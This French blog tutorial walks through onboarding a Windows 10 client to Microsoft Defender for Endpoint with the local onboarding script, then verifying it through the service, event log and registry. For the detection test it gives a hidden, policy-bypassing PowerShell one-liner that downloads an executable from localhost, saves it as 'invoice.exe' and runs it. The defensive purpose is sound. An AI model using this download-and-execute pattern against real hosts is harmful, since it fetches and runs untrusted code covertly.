Defender for Endpoint, nouveau nom de Defender ATP, représente les fonctionnalités de sécurité avancé permettant de gérer les Endpoint (PC Client, Smartphone..).
Defender for Endpoint est utilisable soit conjointement avec Endpoint Manager (Intune), soit de manière autonome en inscrivant les devices via l’utilisation d’une GPO, d’un déploiement de package SCCM ou encore l’utilisation d’un script local généré depuis la console dédiée a Defender for Endpoint: Defender Security Center.
L’exemple qui suit est celui de l’enrollment d’un client Windows 10 via l’utilisation du script local.
Depuis la console Endpoint Manager, aller sur «Sécurité du point de terminaison » puis « Installation / Microsoft Defender ATP »
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1546.png)
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1547.png)
Cliquer sur le lien Ouvrir la console d'administration du connecteur Microsoft Defender ATP pour ouvrir la console Defender Security Center.
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1548.png)
Aller sur Settings / Device management / Onboarding
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1549.png)
Selectionner Windows 10
Selectionner Local Script
Cliquer Download package
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1550.png)
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1551.png)
Copier le package sur la machine cible
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1552.png)
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1553.png)
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1554.png)
Decompresser l’archive et executer le fichier WindowsDefenderATPLocalOnboardingScript.cmd avec des droits administrateur.
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1555.png)
Y
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1556.png)
Press any Key
Le service ‘Windows Defender Advanced Threat Protection Service’ (Sense) passe en mode de démarrage automatique.
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1557.png)
L’information ci-dessous est logué dans l’eventlog Application
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1558.png)
Dans le registre local, la valeur OnboardingState doit être à 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1559.png)
Afin de tester l’enrollment du client executer la commande ci-dessous dans une fenetre de commande éxécutée en tant qu’administrateur.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
La fenêtre d’invite de commandes se ferme automatiquement. En cas de succès, le test de détection sera marqué comme terminé et une nouvelle alerte apparaitra quelques minutes plus tard dans la console Defender Security Center.
En paralelle le nouveau client apparait dans la zone Device Inventory de la console Defender Security Center.
![image image](http://blog.piservices.fr/image.axd?picture=image_thumb_1560.png)
En cas d’erreur, consultez le Lien : https://docs.microsoft.com/fr-fr/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding (rubrique Résoudre les problèmes d’intégration lors du déploiement à l’aide d’un script)